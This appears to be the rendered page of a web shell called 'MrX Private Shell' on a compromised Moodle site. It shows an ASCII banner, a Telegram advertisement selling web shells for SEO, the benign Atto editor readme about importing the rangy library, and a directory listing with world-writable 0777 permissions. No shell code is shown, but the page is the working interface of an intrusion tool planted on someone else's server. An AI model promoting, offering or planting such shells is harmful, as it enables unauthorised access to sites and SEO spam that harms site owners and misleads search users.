__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
Description of the import of libraries associated with the Atto editor.
* Download the latest stable release from https://github.com/timdown/rangy/releases ("rangy-X.Z.Y"
rather than the "Source code" version)
* Delete all files in yui/src/rangy/js
* Copy the content of the 'currentrelease/uncompressed' folder into yui/src/rangy/js
* Patch out the AMD / module support from rangy (because we are loading it with YUI)
To do this - change the code start of each js file except rangy-core.js to look like (just delete the other lines):
(function(factory, root) {
// No AMD or CommonJS support so we use the rangy property of root (probably the global variable)
factory(root.rangy);
})(function(rangy) {
* rangy-core.js should look like this:
(function(factory, root) {
// No AMD or CommonJS support so we place Rangy in (probably) the global variable
root.rangy = factory();
})(function() {
* Run shifter against yui/src/rangy
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| amd | Folder | 0777 |
|
|
| classes | Folder | 0777 |
|
|
| db | Folder | 0777 |
|
|
| lang | Folder | 0777 |
|
|
| pix | Folder | 0777 |
|
|
| plugins | Folder | 0777 |
|
|
| tests | Folder | 0777 |
|
|
| yui | Folder | 0777 |
|
|
| adminlib.php | File | 8.17 KB | 0777 |
|
| autosave-ajax.php | File | 8.05 KB | 0777 |
|
| lib.php | File | 7.01 KB | 0777 |
|
| readme_moodle.txt | File | 983 B | 0777 |
|
| settings.php | File | 2.43 KB | 0777 |
|
| thirdpartylibs.xml | File | 442 B | 0777 |
|
| upgrade.txt | File | 1.5 KB | 0777 |
|
| version.php | File | 1.16 KB | 0777 |
|